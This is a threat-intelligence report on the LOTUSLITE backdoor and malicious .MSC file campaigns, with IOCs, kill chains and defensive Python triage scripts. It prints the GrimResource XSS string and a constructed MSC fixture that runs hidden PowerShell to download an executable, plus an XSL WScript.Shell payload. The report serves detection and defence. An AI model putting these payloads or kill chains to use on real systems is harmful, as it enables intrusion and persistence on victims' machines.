Severity: High | Category: Phishing

LOTUSLITE and MSC File Attack Vector

Investigated: April 3, 2026 | Published: April 3, 2026
Tags: lotuslite, msc, c2, apt, dll-sideloading, cloudflare, tor, lnk

TLP: WHITE | Date: 2026-04-03 | Analyst: GHOST (Breakglass Intelligence) | Classification: APT / Cybercrime (Multiple Campaigns)

Executive Summary

This investigation examines the intersection of two active threat campaigns: (1) the LOTUSLITE backdoor attributed to Mustang Panda (Chinese APT), and (2) an emerging attack vector using malicious .MSC (Microsoft Saved Console) files delivered via WebDAV and Cloudflare infrastructure. GHOST identified TWO LIVE Cloudflare-hosted C2 servers delivering active payloads, recovered two previously unreported PE payloads (a Mythic C2 "coffee" agent DLL and an encrypted loader EXE), and documented the full kill chains for three distinct MSC-based attack campaigns. The Mythic agent contains hardcoded AES-256 encryption keys that have not appeared in any prior reporting.

Key Findings

  • TWO LIVE C2 SERVERS: icewrap[.]com-smartattachment[.]workers[.]dev and s3-ap-northeast-1-amazonaws-com[.]pages[.]dev are actively serving malicious payloads as of 2026-04-03
  • MYTHIC C2 AGENT RECOVERED: The s3-amazonaws C2 delivers a Rust-based Mythic "coffee" agent (xolehlp.dll) using DLL sideloading via msdtc.exe, with extracted AES-256 PSK
  • GRIMRESOURCE TECHNIQUE: The plugin.msc sample uses the GrimResource technique -- an XSS via apds.dll redirect that evaluates JavaScript through MMC ScopeNamespace
  • DUAL PERSISTENCE: The s3-amazonaws kill chain establishes TWO scheduled tasks: "MicrosoftEdgeUpdateTaskMachineCoreXUI" (every 3 min) and "JavaUpdate" (every 7 min, runs as SYSTEM)
  • MUSTANG PANDA EVOLUTION: 25 samples spanning 2024-2026 showing evolution from PlugX to LOTUSLITE, TONESHELL, SnakeDisk, PUBLOAD, and FDMTP
  • LOTUSLITE C2 OFFLINE: 172[.]81[.]60[.]97 (Dynu Systems) shows only port 139 -- campaign has rotated infrastructure

What Was Found vs What Was Known

| Aspect | Prior Reporting (Acronis TRU) | Our Findings |
|---|---|---|
| LOTUSLITE C2 | 172.81.60.97 (single IP) | C2 is offline; Dynu /22 has 30+ LE certs |
| MSC technique | Not linked to LOTUSLITE | 3 distinct MSC campaigns, 2 with LIVE C2 |
| Payload delivery | ZIP with DLL sideloader | MSC via GrimResource/ExecuteShellCommand, hosted on Cloudflare |
| Implant type | Custom C++ backdoor | Mythic C2 "coffee" agent (Rust) + encrypted loader |
| Persistence | Registry Run key | Dual scheduled tasks (user + SYSTEM) |
| Infrastructure | Single IP | Cloudflare Workers + Pages (serverless) |

Attack Chains

Campaign 1: Smart_Policing MSC (c365d45f)

Delivery: Smart_Policing_Industry_Participation.msc

  1. MMC opens the MSC file; its StringTable contains a URL on the icewrap Workers domain.
  2. external.ExecuteShellCommand() launches powershell.exe with -ExecutionPolicy Bypass -WindowStyle Hidden.
  3. PowerShell downloads svchost.exe and executes it from %TEMP% with a hidden window.

Campaign 2: Cyber-Advisory MSC (590879c5)

Delivery: Cyber-Advisory-2026.pdf.msc

  1. Stage 1: cmd.exe downloads p4z3rs.png and writes it to ProgramData as xolehlp.dll.
  2. Stage 2: an XSLT transform with embedded JScript downloads the advisory.pdf decoy.
  3. Stage 3: the legitimate msdtc.exe is copied from System32 to ProgramData as the sideloading host.
  4. Stage 4: scheduled task "MicrosoftEdgeUpdateTaskMachineCoreXUI" is created (3 min interval).
  5. Stage 5: scheduled task "JavaUpdate" is created (7 min interval, runs as SYSTEM).

Result: msdtc.exe loads the malicious xolehlp.dll (Mythic coffee agent) from ProgramData.

Campaign 3: GrimResource MSC (f239e3fe) -- plugin.msc

Delivery: plugin.msc

GrimResource via an HTML-entity-encoded URL in the StringTable:

res://apds.dll./redirect.html?target=javascript:eval(external.Document.ScopeNamespace.GetRoot().Name)

The XSS in apds.dll causes MMC to evaluate the JavaScript held in the Name of the console's root ScopeNamespace node.

LOTUSLITE Campaign (Mustang Panda)

Delivery: "US now deciding what is next for Venezuela.zip"

  1. An LNK file in the archive launches PowerShell, which extracts a tar embedded in the ZIP at offset 795.
  2. The contents are deployed to a GUID-named directory under %LOCALAPPDATA%.
  3. DLL sideloading: the legitimate KuGou player loads kugou.dll (LOTUSLITE).
  4. C2: 172[.]81[.]60[.]97:443, with magic header 0x8899AABB.
  5. Persistence: Registry Run key "Lite360".
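An added example, not the report's or the actor's tooling: Python triage for the polyglot lure described above. It finds where a ZIP really ends (its End of Central Directory record), locates any ustar header inside the blob by validating the tar header checksum, and lists the carved archive's members, so the analyst does not need to know the offset in advance (795 in the real sample). The ZIP-plus-tar blob is constructed inside the script, and the member names are placeholders standing in for the KuGou player and kugou.dll.

```python
import io
import tarfile
import zipfile

USTAR_MAGIC_OFFSET = 257          # "ustar" sits 257 bytes into a 512-byte tar header
EOCD_SIG = b"PK\x05\x06"          # ZIP End of Central Directory signature


def _octal(field):
    text = field.replace(b"\x00", b" ").strip().decode("ascii", "ignore")
    return int(text, 8) if text else 0


def _ustar_header_ok(hdr):
    """A tar header authenticates itself: the chksum field holds the byte sum
    of the header computed with that field blanked to eight spaces."""
    if len(hdr) < 512 or hdr[257:262] != b"ustar":
        return False
    return _octal(hdr[148:156]) == sum(hdr[:148]) + 8 * 0x20 + sum(hdr[156:512])


def zip_end_offset(data):
    """Where the ZIP really ends according to its EOCD record. Bytes after
    that are trailing data that zip tools ignore but a dropper can carve."""
    pos = data.rfind(EOCD_SIG)
    if pos == -1:
        raise ValueError("no EOCD record: not a ZIP")
    comment_len = int.from_bytes(data[pos + 20:pos + 22], "little")
    return pos + 22 + comment_len


def find_embedded_tars(data):
    """Offsets at which a tar archive starts anywhere in the blob. Each ustar
    header is checksum-validated; headers reachable from an earlier one are
    further members of the same archive, not new archives."""
    starts, continuation = [], set()
    pos = data.find(b"ustar")
    while pos != -1:
        off = pos - USTAR_MAGIC_OFFSET
        if off >= 0 and _ustar_header_ok(data[off:off + 512]):
            if off not in continuation:
                starts.append(off)
            size = _octal(data[off + 124:off + 136])
            continuation.add(off + 512 + ((size + 511) // 512) * 512)
        pos = data.find(b"ustar", pos + 1)
    return starts


def carve_tar_members(data, offset):
    with tarfile.open(fileobj=io.BytesIO(data[offset:]), mode="r:") as tf:
        return [m.name for m in tf.getmembers()]


def triage(data):
    end = zip_end_offset(data)
    tars = find_embedded_tars(data)
    return {
        "zip_end": end,
        "trailing_bytes": len(data) - end,
        "tar_offsets": tars,
        "tar_members": {off: carve_tar_members(data, off) for off in tars},
    }


def build_sample():
    """Constructed lure: a ZIP with a decoy document, followed by a tar holding
    a placeholder KuGou player and kugou.dll. Returns the blob and the ZIP length."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("decoy.pdf", b"%PDF-1.4 constructed decoy document")
    tbuf = io.BytesIO()
    with tarfile.open(fileobj=tbuf, mode="w") as tf:
        for name in ("KuGou.exe", "kugou.dll"):
            payload = b"MZ constructed placeholder"
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tf.addfile(info, io.BytesIO(payload))
    return zbuf.getvalue() + tbuf.getvalue(), len(zbuf.getvalue())


if __name__ == "__main__":
    blob, zip_len = build_sample()
    print(triage(blob))
```

Run it against the real archive with `triage(open(path, "rb").read())`; a non-zero `trailing_bytes` or a `tar_offsets` entry inside the ZIP body is the signal that the archive carries more than its directory lists.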

Infrastructure Analysis

Network Infrastructure

| IP/Domain | Type | Provider | Status | Purpose |
|---|---|---|---|---|
| icewrap[.]com-smartattachment[.]workers[.]dev | Workers | Cloudflare | LIVE | Payload delivery |
| s3-ap-northeast-1-amazonaws-com[.]pages[.]dev | Pages | Cloudflare | LIVE | DLL sideloading chain |
| 172[.]81[.]60[.]97 | IP | Dynu Systems (AS398019) | OFFLINE | LOTUSLITE C2 |
| 104[.]21[.]36[.]31 / 172[.]67[.]184[.]85 | IP | Cloudflare | LIVE | Workers proxied IPs |
| 188[.]114[.]97[.]0 / 188[.]114[.]96[.]0 | IP | Cloudflare | LIVE | Pages proxied IPs |

The Cloudflare addresses are shared anycast edges that front countless unrelated sites; they identify the hosting platform, not the actor. Block and hunt on the two hostnames, not on these IPs.

Dynu Systems Infrastructure (172.81.60.0/22)

LOTUSLITE C2 sits within Dynu Systems /22 allocation (172.81.60.0 - 172.81.63.255). CT logs show 30+ Let's Encrypt certificates issued to IPs in this range. Dynu is a dynamic DNS/hosting provider in Chandler, AZ commonly abused by threat actors.

Cloudflare Abuse Pattern

Both live C2s abuse Cloudflare free-tier serverless:

  • Workers (icewrap): JS edge compute with global distribution
  • Pages (s3-amazonaws): Static hosting disguised as AWS S3 URL
  • Domain naming mimics legitimate services

Malware Analysis

svchost_icewrap.exe (Encrypted Loader)

| Field | Value |
|---|---|
| SHA256 | c6210ba0144d8a2c502398aa591b8b6053c186d6b72146e14d09018fe35663c1 |
| Type | PE32+ executable (console) x86-64 |
| Size | 245,760 bytes |
| Compile | 2026-01-12 06:10:08 UTC |
| Imphash | 183d8931dd9cdf26a1768e30473b67f5 |

High-entropy .data section (7.96) indicates encrypted payload. Uses LoadLibraryA + GetProcAddress for dynamic API resolution. Strings include "KeyGuard Failed" and "Decryption Error: 0x%X" -- this is a decryptor/loader.

xolehlp.dll (Mythic C2 Coffee Agent)

| Field | Value |
|---|---|
| SHA256 | 67d7f993304c211f727ac8e25ece366f345f349e38ec62316d66c173943bd244 |
| Type | PE32+ DLL (GUI) x86-64 |
| Size | 354,304 bytes |
| Compile | 2026-01-07 23:38:20 UTC |
| Imphash | bcbfa700ea52123d867e192d94135c49 |
| Exports | DllMain, DtcGetTransactionManager*, Freeze/ThawLocalTransactionManagers |

Mythic C2 "coffee" agent written in Rust. Masquerades as legitimate xolehlp.dll (MS DTC Helper).

Extracted Configuration:

  • Encryption: AES-256-HMAC
  • PSK: H0QmHqnUMbcVE6M3vAHZ52ZQ5dFbsFfkDJlcugxKcZ0=
  • Commands: coffee, upload, c2_update, download, continued_task, sleep, exit
  • C2 Headers: Server ETag, Cache-Control, Keep-Alive, Content-Type, X-AspNetMvc-Version
  • Config marker: pc2g at offset 339174

DLL Sideloading: msdtc.exe (legitimate) loads xolehlp.dll from ProgramData instead of System32.
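As an added example (not the report's code), the check an analyst would run on captured HTTP bodies with the recovered PSK. Mythic's aes256_hmac profile frames each message as base64(UUID || IV || AES-256-CBC ciphertext || HMAC-SHA256(IV || ciphertext)), with the HMAC keyed by the PSK, so a valid MAC ties a request or response to this key before anything is decrypted. The UUID, IV and ciphertext bytes in the sample are constructed; decryption is included for when the third-party `cryptography` package is installed and is otherwise skipped.

```python
import base64
import hashlib
import hmac

# PSK recovered from xolehlp.dll, as reported above (base64 of a 32-byte key).
PSK_B64 = "H0QmHqnUMbcVE6M3vAHZ52ZQ5dFbsFfkDJlcugxKcZ0="
KEY = base64.b64decode(PSK_B64)
assert len(KEY) == 32   # AES-256 key length

UUID_LEN, IV_LEN, MAC_LEN = 36, 16, 32


def frame_message(agent_uuid, iv, ciphertext, key=KEY):
    """Agent side of Mythic's aes256_hmac framing:
    base64(UUID || IV || ciphertext || HMAC-SHA256(IV || ciphertext))."""
    mac = hmac.new(key, iv + ciphertext, hashlib.sha256).digest()
    return base64.b64encode(agent_uuid.encode() + iv + ciphertext + mac).decode()


def parse_message(b64_body, key=KEY):
    """Split a captured body and check whether it was authenticated with this
    key. The UUID is not covered by the MAC; IV and ciphertext are."""
    raw = base64.b64decode(b64_body)
    if len(raw) < UUID_LEN + IV_LEN + MAC_LEN + 16:     # at least one AES block
        return None
    agent_uuid = raw[:UUID_LEN].decode("ascii", "replace")
    iv = raw[UUID_LEN:UUID_LEN + IV_LEN]
    ciphertext, mac = raw[UUID_LEN + IV_LEN:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(key, iv + ciphertext, hashlib.sha256).digest()
    return {
        "uuid": agent_uuid,
        "iv": iv.hex(),
        "ciphertext_len": len(ciphertext),
        "mac_ok": hmac.compare_digest(mac, expected),
    }


def decrypt_ciphertext(iv, ciphertext, key=KEY):
    """AES-256-CBC with PKCS#7 padding, the cipher half of aes256_hmac.
    Runs only when the `cryptography` package is available; otherwise None."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError:
        return None
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    return padded[:-padded[-1]]


# Constructed sample: placeholder UUID, fixed IV and opaque ciphertext bytes,
# framed with the real PSK so the MAC check below succeeds.
SAMPLE_UUID = "00000000-1111-2222-3333-444444444444"
SAMPLE_IV = bytes(range(16))
SAMPLE_CT = bytes(32)
SAMPLE_BODY = frame_message(SAMPLE_UUID, SAMPLE_IV, SAMPLE_CT)


def tampered(body):
    """Flip one ciphertext bit, as a proxy/IDS would see on a different agent."""
    raw = bytearray(base64.b64decode(body))
    raw[UUID_LEN + IV_LEN] ^= 0x01
    return base64.b64encode(bytes(raw)).decode()


if __name__ == "__main__":
    print(parse_message(SAMPLE_BODY))
    print(parse_message(tampered(SAMPLE_BODY)))
```

Feed the base64 POST/response bodies from a capture through `parse_message`; a body whose MAC validates under this PSK came from a build carrying the same key, which is a stronger link than the Googlebot user-agent or the header set alone.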

advisory.pdf (Decoy)

| Field | Value |
|---|---|
| SHA256 | eb62436ead5ac9620fa0f04c13615a869a23267d166869b050eea6a317e93cf1 |
| Type | PDF, 8 pages |

MSC File Attack Technique

What is an MSC File?

Microsoft Saved Console (.msc) files are XML documents that define an MMC snap-in configuration. Windows hands them to mmc.exe, which loads them without the security warning shown for other downloaded content.

Three Attack Variants Observed

  1. GrimResource: XSS in apds.dll reached through its res:// protocol handler (distinct from CVE-2025-26633, the MSC EvilTwin MMC security-feature bypass cited in the references)
  2. ExecuteShellCommand: method on MMC's external object that lets web content loaded in a console taskpad launch arbitrary processes
  3. XSLT Transform: embedded XSL stylesheet processed by MSXML, with JScript/VBScript inside an ms:script block
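A static triage script for the three variants above and the Campaign 1 to 3 chains, as an added Python example rather than code from the report. It parses the console XML, walks every string and attribute, decodes HTML entities and base64 Binary blobs, and flags ExecuteShellCommand, the apds.dll res:// XSS, and embedded ms:script stylesheets, plus any download URL. The two MSC documents inside are constructed for the demonstration, the hostname is a placeholder, and the assumption that an embedded stylesheet sits base64-encoded in a <Binary> element is mine.

```python
import base64
import html
import re
import xml.etree.ElementTree as ET

# One pattern per variant documented in this report, plus a generic URL
# pattern so the analyst also sees where the console wants to reach out.
PATTERNS = {
    "grimresource": re.compile(r"res://apds\.dll|javascript:", re.I),
    "execute_shell_command": re.compile(r"ExecuteShellCommand", re.I),
    "xslt_script": re.compile(r"<ms:script|<xsl:stylesheet|WScript\.Shell", re.I),
    "url": re.compile(r"https?://[^\s\"'<>()]+", re.I),
}
# Namespace declarations inside a stylesheet are not download locations.
IGNORED_URL_PREFIXES = ("http://www.w3.org/",)


def _text_values(root):
    """Yield every text node and attribute value in the console, entity-decoded.

    The XML parser already resolves numeric character references such as
    &#x72;&#x65;&#x73; (the GrimResource trick); html.unescape() additionally
    handles double-encoded strings. <Binary> elements hold base64 in MSC files,
    so their decoded bytes are yielded as well (assumption: an embedded XSL
    stylesheet is stored that way).
    """
    for el in root.iter():
        if el.text and el.text.strip():
            yield html.unescape(el.text)
            if el.tag.endswith("Binary"):
                try:
                    raw = base64.b64decode("".join(el.text.split()), validate=True)
                except ValueError:          # binascii.Error is a ValueError
                    raw = b""
                yield raw.decode("utf-8", "ignore")
        for value in el.attrib.values():
            yield html.unescape(value)


def analyze_msc(xml_text):
    """Return a verdict, the attack variants matched, and any URLs found."""
    root = ET.fromstring(xml_text)
    hits = {name: [] for name in PATTERNS}
    for value in _text_values(root):
        for name, pattern in PATTERNS.items():
            hits[name].extend(m.group(0) for m in pattern.finditer(value))
    variants = sorted(name for name in hits if name != "url" and hits[name])
    urls = sorted({u for u in hits["url"] if not u.startswith(IGNORED_URL_PREFIXES)})
    return {"verdict": "malicious" if variants else "clean",
            "variants": variants, "urls": urls}


# Constructed samples for the demonstration. The hostname is a placeholder;
# the strings mirror the Campaign 1 (ExecuteShellCommand), Campaign 3
# (GrimResource) and Campaign 2 (XSLT/JScript) patterns described above.
XSL_SAMPLE = (
    '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" '
    'xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder">'
    '<ms:script implements-prefix="user" language="JScript">'
    'new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo constructed", 0);'
    "</ms:script></xsl:stylesheet>"
)
XSL_BLOB = base64.b64encode(XSL_SAMPLE.encode()).decode()

MALICIOUS_MSC = f"""<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="User">
  <StringTables><StringTable><Strings>
    <String ID="1" Refs="1">Smart_Policing_Industry_Participation</String>
    <String ID="2" Refs="1">&#x72;&#x65;&#x73;://apds.dll./redirect.html?target=javascript:eval(external.Document.ScopeNamespace.GetRoot().Name)</String>
    <String ID="3" Refs="1">external.ExecuteShellCommand("powershell.exe", "", "-ExecutionPolicy Bypass -WindowStyle Hidden iwr https://cdn.example.invalid/svchost.exe -OutFile $env:TEMP\\svchost.exe", "Minimized")</String>
  </Strings></StringTable></StringTables>
  <BinaryStorage><Binary Name="CONSOLE_MENU">{XSL_BLOB}</Binary></BinaryStorage>
</MMC_ConsoleFile>
"""

BENIGN_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="User">
  <StringTables><StringTable><Strings>
    <String ID="1" Refs="1">Event Viewer (Local)</String>
    <String ID="2" Refs="1">Services</String>
  </Strings></StringTable></StringTables>
</MMC_ConsoleFile>
"""

if __name__ == "__main__":
    for label, doc in (("constructed malicious", MALICIOUS_MSC),
                       ("constructed benign", BENIGN_MSC)):
        print(label, analyze_msc(doc))
```

Point `analyze_msc` at the raw bytes of a quarantined attachment; anything other than a clean verdict is worth detonating, and the URL list is what goes to the proxy team.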

Why MSC Files Are Dangerous

  • Trusted by Windows -- no MotW warnings
  • XML-based -- easy to craft
  • Can embed JS, VBS, ActiveX
  • Can reference external URLs
  • Bypass email/web gateways

Threat Actor Profile

Mustang Panda / LOTUSLITE

  • Confidence: HIGH
  • Country: China (PRC)
  • Motivation: Espionage
  • Targets: US policy, Iran energy, India Buddhist organizations, Adriatic diplomacy, Thailand government

MSC Campaign Operators

  • Confidence: LOW-MEDIUM (separate from Mustang Panda)
  • Mythic C2 framework usage inconsistent with Mustang Panda custom tooling
  • Likely cybercrime operations adopting MSC technique

MITRE ATT&CK Mapping

| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Spearphishing Attachment | T1566.001 |
| Execution | System Binary Proxy Execution: MMC | T1218.014 |
| Execution | PowerShell | T1059.001 |
| Execution | JavaScript | T1059.007 |
| Execution | XSL Script Processing | T1220 |
| Persistence | Scheduled Task | T1053.005 |
| Persistence | Registry Run Keys | T1547.001 |
| Defense Evasion | DLL Side-Loading | T1574.002 |
| Defense Evasion | Masquerading | T1036.005 |
| Defense Evasion | Obfuscated Files | T1027 |
| C2 | HTTP | T1071.001 |
| C2 | Web Service | T1102 |

IOC Summary

Network Indicators

  • icewrap[.]com-smartattachment[.]workers[.]dev (LIVE)
  • s3-ap-northeast-1-amazonaws-com[.]pages[.]dev (LIVE)
  • 172[.]81[.]60[.]97 (OFFLINE)
  • cdn7s65[.]z13[.]web[.]core[.]windows[.]net (Azure delivery)

File Indicators (SHA256)

  • c6210ba0144d8a2c502398aa591b8b6053c186d6b72146e14d09018fe35663c1 -- svchost.exe (loader)
  • 67d7f993304c211f727ac8e25ece366f345f349e38ec62316d66c173943bd244 -- xolehlp.dll (Mythic coffee)
  • eb62436ead5ac9620fa0f04c13615a869a23267d166869b050eea6a317e93cf1 -- advisory.pdf (decoy)
  • f239e3fedc4926ff3cf58f95bacff9d8f11289e58036ed507ab3f435dce1b2b1 -- plugin.msc (GrimResource)
  • c365d45f893403ca7d1a7a05d28d2d153aaeb4fa15218435cab316a0b5d3ff53 -- Smart_Policing.msc
  • 590879c567c6d95b18b34e46e9830ba7b807279d76d83abc066f013d4b6f693e -- Cyber-Advisory.msc
  • 819f586ca65395bdd191a21e9b4f3281159f9826e4de0e908277518dba809e5b -- LOTUSLITE loader
  • 2c34b47ee7d271326cfff9701377277b05ec4654753b31c89be622e80d225250 -- kugou.dll (LOTUSLITE)
  • de13e4b4368fbe8030622f747aed107d5f6c5fec6e11c31060821a12ed2d6ccd -- Tehran Province ZIP
  • 87929c8f53341a5e413950d33c7946c64e1d4b2eba6d1a8b2d08ef56f7065052 -- Post-Meeting Report LNK

Behavioral Indicators

  • Mutex: Global\Technology360-A@P@T-Team
  • Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Lite360
  • Tasks: MicrosoftEdgeUpdateTaskMachineCoreXUI, JavaUpdate
  • Paths: C:\ProgramData\Microsoft\Windows\msdtc.exe, C:\ProgramData\Microsoft\Windows\xolehlp.dll
  • C2 Magic: 0x8899AABB
  • User-Agent: Googlebot (with Microsoft Host header)
  • AES-256 PSK: H0QmHqnUMbcVE6M3vAHZ52ZQ5dFbsFfkDJlcugxKcZ0=
  • Imphash: 183d8931dd9cdf26a1768e30473b67f5, bcbfa700ea52123d867e192d94135c49

Recommendations

Immediate (24-48 hours)

  • Block both Cloudflare domains at proxy/DNS
  • Hunt for scheduled tasks: MicrosoftEdgeUpdateTaskMachineCoreXUI, JavaUpdate
  • Search for msdtc.exe running from ProgramData (not System32)
  • Deploy YARA rules to scan endpoints
  • Report domains to Cloudflare Trust and Safety

Short-term (1-2 weeks)

  • Monitor mmc.exe loading MSC files from unusual paths
  • Block MSC file attachments at email gateway
  • Monitor DLL sideloading: msdtc.exe loading xolehlp.dll from non-System32
  • Deploy Suricata rules for Mythic C2 patterns
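Hunting logic for the dual-task persistence in Campaign 2 and the scheduled-task and msdtc.exe items in the lists above, as an added Python example rather than the report's own tooling. It parses Task Scheduler XML (the output of `schtasks /query /xml`, or the files under C:\Windows\System32\Tasks) and flags watchlisted names, beacon-like repetition intervals, SYSTEM principals, and commands that run from ProgramData or run msdtc.exe outside System32. The two task definitions and the 10-minute threshold are my assumptions; the report does not state which binary the tasks execute, so the suspicious sample ties them to the relocated msdtc.exe.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path, PureWindowsPath

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
WATCHLIST = {"microsoftedgeupdatetaskmachinecorexui", "javaupdate"}   # from this report
SYSTEM_SID = "S-1-5-18"
SHORT_INTERVAL_SECONDS = 10 * 60   # assumption: repeating this often looks like a beacon


def iso_duration_seconds(text):
    """Task Scheduler stores intervals as ISO 8601 durations (PT3M, P1DT2H)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", (text or "").strip())
    if not m:
        return None
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def analyze_task_xml(xml_text, name_hint=None):
    """Flag the traits of the Campaign 2 persistence tasks in one task definition."""
    root = ET.fromstring(xml_text)
    findings = []
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    name = name_hint or uri.rsplit("\\", 1)[-1]
    if name.lower() in WATCHLIST:
        findings.append(f"task name on watchlist: {name}")
    for interval in root.iterfind(".//t:Repetition/t:Interval", NS):
        secs = iso_duration_seconds(interval.text)
        if secs is not None and secs <= SHORT_INTERVAL_SECONDS:
            findings.append(f"beacon-like repetition every {secs}s")
    if root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=NS) == SYSTEM_SID:
        findings.append("runs as SYSTEM (S-1-5-18)")
    for cmd in root.iterfind("t:Actions/t:Exec/t:Command", NS):
        path = PureWindowsPath((cmd.text or "").strip().strip('"'))
        parent = str(path.parent).lower()
        if parent.startswith(r"c:\programdata"):
            findings.append(f"command runs from ProgramData: {path}")
        if path.name.lower() == "msdtc.exe" and parent != r"c:\windows\system32":
            findings.append(f"msdtc.exe outside System32: {path}")
    return {"task": name, "findings": findings, "suspicious": bool(findings)}


def scan_task_store(tasks_dir=r"C:\Windows\System32\Tasks"):
    """Walk the on-disk task store (one UTF-16 XML file per task) on a live host."""
    reports = []
    for path in Path(tasks_dir).rglob("*"):
        if path.is_file():
            try:
                report = analyze_task_xml(path.read_bytes(), name_hint=path.name)
            except ET.ParseError:
                continue
            if report["suspicious"]:
                reports.append(report)
    return reports


# Constructed task definitions. The report does not say which binary the
# tasks execute; the first sample assumes the relocated msdtc.exe.
MALICIOUS_TASK = r"""<?xml version="1.0"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\JavaUpdate</URI></RegistrationInfo>
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT7M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
    <StartBoundary>2026-01-07T00:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Principals><Principal id="Author">
    <UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel>
  </Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\ProgramData\Microsoft\Windows\msdtc.exe</Command>
  </Exec></Actions>
</Task>
"""

BENIGN_TASK = r"""<?xml version="1.0"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\ConstructedMaintenance</URI></RegistrationInfo>
  <Triggers><CalendarTrigger>
    <StartBoundary>2026-01-07T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
  </CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>CORP\svc-maint</UserId></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\defrag.exe</Command><Arguments>C: /O</Arguments>
  </Exec></Actions>
</Task>
"""

if __name__ == "__main__":
    for sample in (MALICIOUS_TASK, BENIGN_TASK):
        print(analyze_task_xml(sample))
```

The name check alone is brittle (the actor can rename the task); the interval, principal and command-path checks are what keep catching the pattern after a rename, and together they are a reasonable base for the Sysmon or EDR rule in the medium-term list.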

Medium-term (1-3 months)

  • Restrict mmc.exe for non-administrative users with WDAC or AppLocker; an MSC file is data loaded by mmc.exe, so the control has to target the host process rather than the .msc extension
  • Deploy Sysmon rules monitoring MMC child processes
  • Evaluate blocking res:// protocol handler

References

  • Acronis TRU: LOTUSLITE Targeted Espionage
  • Trend Micro: CVE-2025-26633 MSC EvilTwin
  • Splunk: Breaking Trust in MMC -- XML-Driven Malicious Loader Detection
  • MITRE ATT&CK: T1218.014 System Binary Proxy Execution: MMC
  • Picus Security: Mustang Panda Campaign Breakdown

GHOST -- Breakglass Intelligence "One indicator. Total infrastructure."
